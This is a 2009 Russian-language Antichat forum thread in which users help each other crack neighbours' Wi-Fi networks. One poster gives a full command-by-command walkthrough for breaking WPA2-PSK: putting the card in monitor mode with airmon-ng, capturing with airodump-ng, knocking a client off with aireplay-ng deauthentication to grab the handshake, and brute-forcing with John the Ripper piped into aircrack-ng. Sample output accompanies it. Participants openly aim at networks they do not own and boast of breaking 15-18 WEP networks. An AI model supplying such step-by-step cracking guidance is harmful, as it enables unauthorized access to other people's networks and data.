ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Электроника и Фрикинг > Беспроводные технологии/WPAN/WLAN
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1931  
Старый 17.05.2009, 13:29
Аватар для boykent
boykent
Познающий
Регистрация: 08.05.2009
Сообщений: 69
Провел на форуме:
115080

Репутация: 16
По умолчанию

Semby68
Привет. Спасибо тебе! Перевёл я карту в режим мониторинга. И сново появилась проблема!Когда я прописываю путь bt# /usr/bin/lzm2dir/mnt/sde1/spoonwep2.lzm/ и bt# /usr/bin/lzm2dir/mnt/sde1/SWPA.lzm/ мне пишет Not a directory! Что это может быть? Я пробывал как с usb так и с системы эти файлы прописывать но ничего не получилось! А когда я захожу в K/backtrack/Radio Network Analysis/80211/All/ то у меня там можно увидеть только Spoonwep! А вот Spoonwep2 и Spoonwpa вообще нет!!! Может чё подскажешь или ещё кто знает?
 
Ответить с цитированием

  #1932  
Старый 17.05.2009, 15:31
Аватар для Semby68
Semby68
Познающий
Регистрация: 24.03.2009
Сообщений: 43
Провел на форуме:
110385

Репутация: 22
По умолчанию

Цитата:
Сообщение от boykent  
Semby68
Привет. Спасибо тебе! Перевёл я карту в режим мониторинга. И сново появилась проблема!Когда я прописываю путь bt# /usr/bin/lzm2dir/mnt/sde1/spoonwep2.lzm/ и bt# /usr/bin/lzm2dir/mnt/sde1/SWPA.lzm/ мне пишет Not a directory! Что это может быть? Я пробывал как с usb так и с системы эти файлы прописывать но ничего не получилось! А когда я захожу в K/backtrack/Radio Network Analysis/80211/All/ то у меня там можно увидеть только Spoonwep! А вот Spoonwep2 и Spoonwpa вообще нет!!! Может чё подскажешь или ещё кто знает?
по командам видно что пропустил несколько пробелов,
проще скопируй команды в блокнот и его скинь на usb, и с блокнота копируй команды в консоль и запускайся ,если ты правильно написал что твоё usb отобразилось sde1
то,
airmon-ng

airmon-ng start rausb0 { в место rausb0 твой драйвер wi-fi карты}

/usr/bin/lzm2dir /mnt/sde1/spoonwep2.lzm /

/usr/bin/lzm2dir /mnt/sde1/SWPA.lzm /

смотри всё тоже но после lzm2di пробел и после .lzm пробел.Да и ещё если usb будешь вытаскивать вставлять то буква будет меняться , например sde1 ,sdb1 ,sdd1,и тд. А потом ищешь как и раньше. Вроде ошибки не должно быть. Удачи !!!
 
Ответить с цитированием

  #1933  
Старый 17.05.2009, 22:23
Аватар для boykent
boykent
Познающий
Регистрация: 08.05.2009
Сообщений: 69
Провел на форуме:
115080

Репутация: 16
По умолчанию

Semby68
Спасибо, попробую! И ТЕбе удачи во всех твоих делах!!!
 
Ответить с цитированием

  #1934  
Старый 19.05.2009, 15:15
Аватар для Semby68
Semby68
Познающий
Регистрация: 24.03.2009
Сообщений: 43
Провел на форуме:
110385

Репутация: 22
По умолчанию

Цитата:
Сообщение от boykent  
Semby68
Спасибо, попробую! И ТЕбе удачи во всех твоих делах!!!

если очень заинтересовал ВТ-3 ?

могу отписать команды на взлом WEP с консоли , это быстрее подберёшь ключ чем / Spoonwep2.lzm / !!!
semby68
 
Ответить с цитированием

  #1935  
Старый 19.05.2009, 19:31
Аватар для boykent
boykent
Познающий
Регистрация: 08.05.2009
Сообщений: 69
Провел на форуме:
115080

Репутация: 16
По умолчанию

Semby68
Привет, если можешь опиши. В ВТ-3 всё получилось с командами прописать путь к файлам!Спасибо! Ещё вопросик есть. Как взломать сети WiFi с WPA2, WPA2-TSK, WPA-PSP, и т.д?Просто возле меня их много и многие вот с таким шифрованием.Или их не как нельзя!
 
Ответить с цитированием

  #1936  
Старый 19.05.2009, 19:48
Аватар для razb
razb
Постоянный
Регистрация: 24.03.2009
Сообщений: 670
Провел на форуме:
2868783

Репутация: 414


Отправить сообщение для razb с помощью ICQ
По умолчанию

Цитата:
Как взломать сети WiFi с WPA2, WPA2-TSK, WPA-PSP, и т.д?Просто возле меня их много и многие вот с таким шифрованием.Или их не как нельзя!
Статьи почитать не судьба?
 
Ответить с цитированием

  #1937  
Старый 19.05.2009, 22:45
Аватар для Semby68
Semby68
Познающий
Регистрация: 24.03.2009
Сообщений: 43
Провел на форуме:
110385

Репутация: 22
По умолчанию

Цитата:
Сообщение от razb  
Статьи почитать не судьба?

есть кое что ! но это с ВТ-4 , сам пробую WPA взломать но пока в ожидании , у парня сетка висит WPA а рядом больше ничего нет , так вот уже вторые сутки ВТ-4 крутит, и пока ожидаем результат, по словарям её не вскрыли ,пробуем то что есть в самом ВТ-4.

если хочешь попробуй !

скачай ВТ-4 ISO и залей на USB или на CD .

Вход в ВТ-4 Login # root дави Enter

# toor дави Enter

# startx дави Enter

Переводишь карту в режим мониторинга.

команды которые отпишу закинь в блокнот и блокнот скинь на USB . но когда начинается загрузка ВТ-4 USB должно сразу стоять в компе иначе его не откроешь
потом ищи его системе ВТ-4 если не знаешь как ,то просмотри весь ВТ-4 я думаю что найдёшь.

Не забудь о правильном копирование или создании команд , иначе Default

Для начала переводим карту в режим "monitor mode" :

root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]



root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

Сделано, и теперь мы можем использовать карту как mon0

Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :

root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet


Остановите airodump-ng и запустите его заново, записывая все пакеты в файл: остановить клавиши Ctrl +C , нажать обе.

и запускаем заново

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)


root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу:

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

Остановите airodump-ng и убедитесь что все необходимые файлы созданы

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv


Успешность взлома напрямую зависит от сложности пароля. Другими словами, вам может повезти и вы найдете ключ сразу, или не найдете его совсем.
Следующий метод, брутфорс, будет успешным практически наверняка, но может занять очень длительный срок. Необходимо понимать, что ключ WPA2 может содержать до 64-ех символов. Для начала взлома, если вы хотите использовать John The Ripper для создания всех возможных парольных комбинаций, выполните следующую команду.


root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

вроде всё так , пробуй , может повезёт . удачи !!!
 
Ответить с цитированием

  #1938  
Старый 21.05.2009, 02:09
Аватар для boykent
boykent
Познающий
Регистрация: 08.05.2009
Сообщений: 69
Провел на форуме:
115080

Репутация: 16
По умолчанию

Спасибо, попробую. А ты если можешь , отпишись, получилось взломать WPA с помошью ВТ-4! Очень интересно! А вот у меня пока ещё ничего не получилось!Не могу взломать никакую сеть хотя всё вроде правильно делаю, пробую каждый день понемногу, а так хочется!
 
Ответить с цитированием

  #1939  
Старый 21.05.2009, 21:32
Аватар для boykent
boykent
Познающий
Регистрация: 08.05.2009
Сообщений: 69
Провел на форуме:
115080

Репутация: 16
По умолчанию

Semby68

Привет. Скажи мне пожалуйста, у тебя получалось взломать WPA или WEP? Я почемуто не могу не какую взломать! Есть и WPA,WPA2 и причём не одна. Есть WEP скрытая, пытался сначало поломать её ,сделал так как ты всё описал,но так ничего и не добился!Может я мало пакетов собираю? Самое большее собрал 250000 примерно!Потом пытался WPA поломать, тоже не чего!Никак не могу впоймать handshake! Рядом с сетью нет клиента, второй способ не помог как ты описывал! Чё мож не так делаю, всё вроде делаю так как ты описал!
 
Ответить с цитированием

  #1940  
Старый 22.05.2009, 00:56
Аватар для Semby68
Semby68
Познающий
Регистрация: 24.03.2009
Сообщений: 43
Провел на форуме:
110385

Репутация: 22
По умолчанию

Цитата:
Сообщение от boykent  
Semby68

Привет. Скажи мне пожалуйста, у тебя получалось взломать WPA или WEP? Я почемуто не могу не какую взломать! Есть и WPA,WPA2 и причём не одна. Есть WEP скрытая, пытался сначало поломать её ,сделал так как ты всё описал,но так ничего и не добился!Может я мало пакетов собираю? Самое большее собрал 250000 примерно!Потом пытался WPA поломать, тоже не чего!Никак не могу впоймать handshake! Рядом с сетью нет клиента, второй способ не помог как ты описывал! Чё мож не так делаю, всё вроде делаю так как ты описал!
WEP сети которые у меня видны я все поломал , даже у родственников в другом городе в ВТ-3 это гдето 15-18 сеток прогой Spoonwep2.lzm,эта прога должна сама определить сколько ей надо пакетов автоматом и выдать тебе ключ ,посмотри внимательно видео , в этой проге атаки можно менять , может мало ждал?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Delphi]/[Pascal] Задай вопрос, получи ответ Isis С/С++, C#, Delphi, .NET, Asm 6762 17.06.2010 21:23
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ